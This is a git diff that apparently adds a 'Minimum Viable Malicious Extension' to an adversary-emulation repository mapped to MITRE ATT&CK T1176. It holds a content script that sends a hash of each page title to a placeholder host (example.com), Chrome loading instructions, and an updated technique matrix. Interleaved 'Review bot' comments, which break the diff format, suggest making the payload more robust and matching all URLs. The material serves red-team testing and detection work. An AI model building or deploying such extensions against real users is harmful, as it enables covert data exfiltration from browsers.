diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Linux/Collection/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js
new file mode 100644
index 00000000..15a8e4c7
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/inline.js
@@ -0,0 +1,37 @@
+function exfil(str) {
+ // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included.
+ // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com
+ // and probably a thousand other methods. But this one is easy.
+ var buffer = new TextEncoder("utf-8").encode(str);
+ return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
+}
+
+function callUrl(buffer) {
+ // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls
+ // except it's example.com so w/e
+ var digest = hex(buffer);
+ var url = "https://example.com/" + digest;
+ console.log("Exfiltrating data to " + url)
+ var xmlHttp = new XMLHttpRequest();
+ xmlHttp.open( "GET", url, true);
+ xmlHttp.send( null);
+ return digest;
+}
+
+function hex(buffer) {
+ // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest
+ var hexCodes = [];
+ var view = new DataView(buffer);
+ for (var i = 0; i < view.byteLength; i += 4) {
+ var value = view.getUint32(i)
+ var stringValue = value.toString(16)
+ var padding = '00000000'
+ var paddedValue = (padding + stringValue).slice(-padding.length)
+ hexCodes.push(paddedValue);
+ }
+ var athing = hexCodes.join("");
+ return hexCodes.join("");
+}
+
+// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here.
+var digest = exfil(document.title);
\ No newline at end of file
diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json
new file mode 100644
index 00000000..a4243cba
--- /dev/null
+++ b/Linux/Payloads/Browser_Extension/manifest.json
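Review bot: The top-level `var digest = exfil(document.title);` starts a promise chain with no rejection handler, and `crypto.subtle` is only exposed in secure contexts, so on a plain http:// page (which a content script presumably shares the security context of — worth confirming) `crypto.subtle.digest` is a call on `undefined`, `exfil` throws synchronously, and the payload does nothing with no visible error; for a demo payload that silent failure is the thing a tester will trip over first. The same variable name also holds a Promise at top level but a hex string inside `callUrl`, `var athing = hexCodes.join("");` in `hex` is dead code, and the `"utf-8"` argument to `TextEncoder` is ignored by the platform. I would guard the insecure-context case explicitly, drop the dead line, and give the chain a `.catch` so failures surface in the extension's console.
```javascript
function exfil(str) {
 // SHA-256 is only available in secure contexts; fail loudly rather than throwing a bare TypeError.
 if (!crypto.subtle) {
 return Promise.reject(new Error("crypto.subtle unavailable (insecure context)"));
 }
 var buffer = new TextEncoder().encode(str);
 return crypto.subtle.digest("SHA-256", buffer).then(callUrl);
}
// … unchanged: callUrl, hex (minus the dead `athing` line) …
exfil(document.title).catch(function (err) {
 console.log("Exfiltration failed: " + err);
});
```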
@@ -0,0 +1,16 @@
+{
+ "name": "Minimum Viable Malicious Extension",
+ "description": "Base Level Extension",
+ "version": "1.0",
+ "manifest_version": 2,
+ "content_scripts": [
+ {
+ "matches": [
+ ""
+ ],
+ "js": [
+ "inline.js"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
new file mode 100644
index 00000000..f38f59f4
--- /dev/null
+++ b/Linux/Persistence/Browser_Extensions.md
@@ -0,0 +1,12 @@
+## Browser Extensions
+
+MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
+
+
+### Chrome
+
+Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
+
+Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
+
+Then click 'Select'
\ No newline at end of file
diff --git a/Linux/README.md b/Linux/README.md
index 825187fd..7c2cc91c 100644
--- a/Linux/README.md
+++ b/Linux/README.md
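Review bot: The `"matches": [ "" ]` entry in `content_scripts` is not a valid match pattern, so Chrome will refuse to load the unpacked extension and `inline.js` never runs, which breaks the 'Load unpacked extension...' walkthrough in the accompanying docs. The intended value is almost certainly `"<all_urls>"`; it is plausible that the literal `<all_urls>` was stripped as an HTML tag somewhere between the author's editor and this rendering, but the committed file should be checked and read `"matches": ["<all_urls>"]`. Two caveats worth a comment in the docs rather than the manifest (JSON has no comment syntax): with `<all_urls>` Chrome shows the "read and change all your data on all websites" warning at install, which is the detection opportunity defenders should look for, and recent Chrome releases are phasing out `manifest_version` 2, so the loading instructions may need an MV3 variant to keep working.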
@@ -4,14 +4,14 @@
 |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
 | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
 | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
-| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy |
-| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
-| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
-| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
-| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
-| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
-| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
-| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |
+| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
+| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol |
+| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
+| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
+| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation |
+| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels |
+| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels |
+| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication |
 | | | Masquerading | | | | | | | Multilayer Encryption |
 | | | Redundant Access | | | | | | | Remote File Copy |
 | | | Scripting | | | | | | | Standard Application Layer Protocol |